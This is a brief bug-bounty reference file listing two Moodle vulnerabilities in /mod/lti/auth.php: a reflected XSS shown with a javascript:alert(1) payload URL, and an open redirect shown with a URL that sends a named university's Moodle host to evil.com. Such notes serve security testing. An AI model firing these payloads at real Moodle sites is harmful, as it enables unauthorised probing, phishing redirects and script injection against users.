Projects STRLCPY AllAboutBugBounty Files
🤬
12 lines | ISO-8859-1 | 304 bytes

Moodle

  1. Reflected XSS in /mod/lti/auth.php via "redirect_url" parameter
https://target.com/mod/lti/auth.php?redirect_uri=javascript:alert(1)
  1. Open redirect in /mod/lti/auth.php in "redirect_url" parameter
https://classroom.its.ac.id/mod/lti/auth.php?redirect_uri=https://evil.com
Please wait...
Page is in error, reload to recover